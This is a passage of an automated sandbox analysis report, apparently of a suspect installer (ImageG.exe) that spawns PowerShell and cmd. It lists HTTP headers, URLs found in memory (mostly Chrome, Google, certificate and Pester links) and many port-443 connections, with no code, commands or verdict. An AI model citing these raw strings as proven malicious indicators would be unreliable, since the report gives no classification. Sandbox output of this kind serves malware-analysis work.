cfL4;desc="?proto=TCP&rtt=117919&min_rtt=117900&rtt_var=24899&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2800&recv_bytes=818&delivery_rate=34229&cwnd=252&unsent_bytes=0&cid=eb9574710c42c2d1&ts=293&x=0"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-f393f2aX-Version: f393f2aX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Sat, 15 Mar 2025 19:27:01 GMTConnection: closeTransfer-Encoding: chunked
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-f393f2aX-Version: f393f2aX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Sat, 15 Mar 2025 19:27:01 GMTConnection: closeTransfer-Encoding: chunked
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-f393f2aX-Version: f393f2aX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Sat, 15 Mar 2025 19:27:01 GMTConnection: closeTransfer-Encoding: chunked
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: close
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/1352358
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/275944
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/378067
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/437891.
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/456214
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/497301
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/510270
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/514696
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/642141
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/672186).
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/717501
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/775961
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/819404
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/839189
        Source: resources.pak.0.drString found in binary or memory: http://crbug.com/957772
        Source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: ImageG.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.75865632150.000001D7002C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.75870251349.00000184E71EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.75865671340.00000269002CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.75865632150.000001D7002C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.75870251349.00000184E71EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.75865671340.00000269002CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
        Source: powershell.exe, 00000019.00000002.75885797086.000001D280721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.75862419940.0000016F532C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.75881428719.000002BE5F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.75865632150.000001D700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.75870251349.00000184E6F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.75874496747.0000021800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.75865671340.0000026900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.75865632150.000001D7002C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.75870251349.00000184E71EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.75865671340.00000269002CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.75865632150.000001D7002C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.75870251349.00000184E71EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.75865671340.00000269002CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
        Source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: powershell.exe, 00000019.00000002.75885797086.000001D280721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.75862419940.0000016F532C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.75881428719.000002BE5F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.75865632150.000001D700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.75870251349.00000184E6F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.75874496747.0000021800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.75865671340.0000026900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: resources.pak.0.drString found in binary or memory: https://chrome.google.com/webstore
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore/category/extensions
        Source: am.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=am&category=theme81https://myactivity.google.com/myactivity/?u
        Source: am.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=amCtrl$1
        Source: ca.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=ca&category=theme81https://myactivity.google.com/myactivity/?u
        Source: ca.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=caCtrl$1
        Source: en-US.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
        Source: en-US.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=enCtrl$1
        Source: fr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u
        Source: fr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=frCtrl$1
        Source: it.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=it&category=theme81https://myactivity.google.com/myactivity/?u
        Source: it.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=itCtrl$1
        Source: kn.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=kn&category=theme81https://myactivity.google.com/myactivity/?u
        Source: kn.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=knCtrl$1
        Source: lv.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=lvCtrl$1
        Source: mr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=mr&category=theme81https://myactivity.google.com/myactivity/?u
        Source: mr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=mrCtrl$1
        Source: pt-BR.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=pt-BR&category=theme81https://myactivity.google.com/myactivity
        Source: pt-BR.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=pt-BRCtrl$1
        Source: uk.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=uk&category=theme81https://myactivity.google.com/myactivity/?u
        Source: uk.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=ukCtrl$1
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
        Source: resources.pak.0.drString found in binary or memory: https://chromewebstore.google.com/
        Source: resources.pak.0.drString found in binary or memory: https://codereview.chromium.org/25305002).
        Source: resources.pak.0.drString found in binary or memory: https://crbug.com/1201800
        Source: resources.pak.0.drString found in binary or memory: https://crbug.com/1245093):
        Source: resources.pak.0.drString found in binary or memory: https://crbug.com/1446731
        Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.75865632150.000001D7002C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.75870251349.00000184E71EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.75865671340.00000269002CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.75865632150.000001D7002C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.75870251349.00000184E71EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.75865671340.00000269002CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
        Source: cmd.exe, 0000000D.00000002.75850443177.000002C574B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.imgflip.com/472b3c.jpg
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.dr, lv.pak.0.drString found in binary or memory: https://myactivity.google.com/
        Source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: uk.pak.0.dr, am.pak.0.drString found in binary or memory: https://passwords.google.com
        Source: fr.pak.0.dr, ca.pak.0.drString found in binary or memory: https://passwords.google.comCompte
        Source: pt-BR.pak.0.drString found in binary or memory: https://passwords.google.comConta
        Source: en-US.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, mr.pak.0.drString found in binary or memory: https://passwords.google.comGoogle
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.dr, lv.pak.0.drString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.dr, lv.pak.0.drString found in binary or memory: https://policies.google.com/
        Source: uk.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.drString found in binary or memory: https://support.google.com/chrome/answer/6098869
        Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.dr, am.pak.0.dr, it.pak.0.dr, kn.pak.0.dr, ca.pak.0.dr, mr.pak.0.dr, lv.pak.0.drString found in binary or memory: https://support.google.com/chromebook?p=app_intent
        Source: resources.pak.0.drString found in binary or memory: https://www.google.com/
        Source: uk.pak.0.dr, am.pak.0.dr, kn.pak.0.dr, mr.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
        Source: fr.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html&AideG
        Source: pt-BR.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlA&judaGerenciado
        Source: ca.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlA&judaGestionat
        Source: it.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlG&uidaGestito
        Source: en-US.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
        Source: unknownNetwork traffic detected: HTTP traffic on port 60873 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58381 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58375 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58403 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58019 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58426 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 65375 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52960 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49610
        Source: unknownNetwork traffic detected: HTTP traffic on port 64795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52570 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59151 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58408 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 61018 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58386 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58392 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62332 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 61253 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63379
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61750
        Source: unknownNetwork traffic detected: HTTP traffic on port 58415 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58432 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 54618 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58421 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58911
        Source: unknownNetwork traffic detected: HTTP traffic on port 58402 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 56244 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58393 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58387 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 61017 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58410 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55419
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51054
        Source: unknownNetwork traffic detected: HTTP traffic on port 49610 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58427 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58377
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58376
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58379
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58378
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58373
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58372
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58375
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58374
        Source: unknownNetwork traffic detected: HTTP traffic on port 52896 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63156
        Source: unknownNetwork traffic detected: HTTP traffic on port 58398 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58438 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54618
        Source: unknownNetwork traffic detected: HTTP traffic on port 58436 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 58413 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58418
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58417
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58419
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58414
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58413
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58416
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58415
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58421
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58420
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56244
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58423
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58422
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 60576 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62370
        Source: unknownNetwork traffic detected: HTTP traffic on port 62812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 58376 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58382 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58429
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58428
        Source: unknownNetwork traffic detected: HTTP traffic on port 58404 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52567
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58425
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58427
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58425 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58426
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58432
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58431
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58434
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58433
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52570
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58430
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57341
        Source: unknownNetwork traffic detected: HTTP traffic on port 52334 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51054 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51108 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58419 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58377 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 58383 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60378 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58436
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58435
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52334
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58438
        Source: unknownNetwork traffic detected: HTTP traffic on port 58409 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58437
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60873
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62812
        Source: unknownNetwork traffic detected: HTTP traffic on port 58431 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64795
        Source: unknownNetwork traffic detected: HTTP traffic on port 58414 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 65238 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58437 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58399 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58420 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
        Source: unknownNetwork traffic detected: HTTP traffic on port 64272 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58388 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60089
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62825
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60086
        Source: unknownNetwork traffic detected: HTTP traffic on port 58394 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52286 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62941
        Source: unknownNetwork traffic detected: HTTP traffic on port 52567 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50696
        Source: unknownNetwork traffic detected: HTTP traffic on port 58423 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54140
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60378
        Source: unknownNetwork traffic detected: HTTP traffic on port 58389 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58400 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59151
        Source: unknownNetwork traffic detected: HTTP traffic on port 61577 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 63156 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53074 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59864 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58372 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52287 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58429 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62568
        Source: unknownNetwork traffic detected: HTTP traffic on port 62370 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59106 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60086 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58893 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58373 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58405 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49598 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52896
        Source: unknownNetwork traffic detected: HTTP traffic on port 61691 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58401
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58400
        Source: unknownNetwork traffic detected: HTTP traffic on port 58911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53074
        Source: unknownNetwork traffic detected: HTTP traffic on port 58418 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62332
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58435 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58378 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 58384 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58407
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58406
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58409
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58408
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58403
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58402
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58405
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58404
        Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61017
        Source: unknownNetwork traffic detected: HTTP traffic on port 58390 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58410
